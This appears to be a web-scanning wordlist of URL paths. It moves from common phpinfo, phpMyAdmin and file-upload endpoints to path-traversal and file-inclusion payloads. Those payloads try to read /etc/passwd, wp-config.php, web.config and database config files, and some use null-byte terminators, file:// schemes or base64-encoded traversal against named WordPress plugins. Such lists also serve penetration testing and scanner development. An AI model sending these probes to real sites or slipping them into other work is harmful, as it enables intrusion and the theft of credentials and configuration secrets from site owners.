/phpinfo.php
/info.php
/php.php
/test.php
/php_info.php
/mysql.php
/i.php
/pma.php
/mysql/
/myadmin/
/phpmyadmin/
/phpMyAdmin/
/sql/
/admin/phpinfo.php
/admin/info
/adm/phpinfo.php
/gnu/adm/phpinfo.php
/install/
/contact.html
/contact.php
/careers_apply.php
/apply.php
/download.php
/download.php?filename=../index.php
/download.php?file=../index.php
/download.php?filepath=../index.php
/photoupload.php
/photo.php
/upload.php
/upfile.php
/fileupload.php
/upload_file.php
/file-upload.php
/demo.php
/php_file_upload.php
/php-upload-file.htm
/php-upload-file.php
/file-uploading.html
/file-uploading.php
/upload_form.php
/imageUp.php
/php-uploads.php
/page.php
/Question_DownLoad.php?filename=../index.php
/DownLoad.php?filename=
/download.ashx?files=../web.config
/readfile.php?file=../index.php
/read.php?file=../index.php
/index.php?file=../index.php
/downloadpdffile.php?fileName=../index.php
/index.php?f=../../../../../../../etc/passwd
/index.php?f=../index.php
/index.php?f=file:///etc/passwd
/file_download.php
/rg4_board/spam_img.php?file=../rg4_data/db_info.php
/spam_img.php?file=../index.php
/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd
/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vZGF0YQ==
/_head.php?_zb_path=../../../../../etc/passwd%00
/include/write.php?dir=../../../../../etc/passwd%00
/outlogin.php?_zb_path=../../../../../etc/passwd%00 
/force-download.php?file=wp-config.php
/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd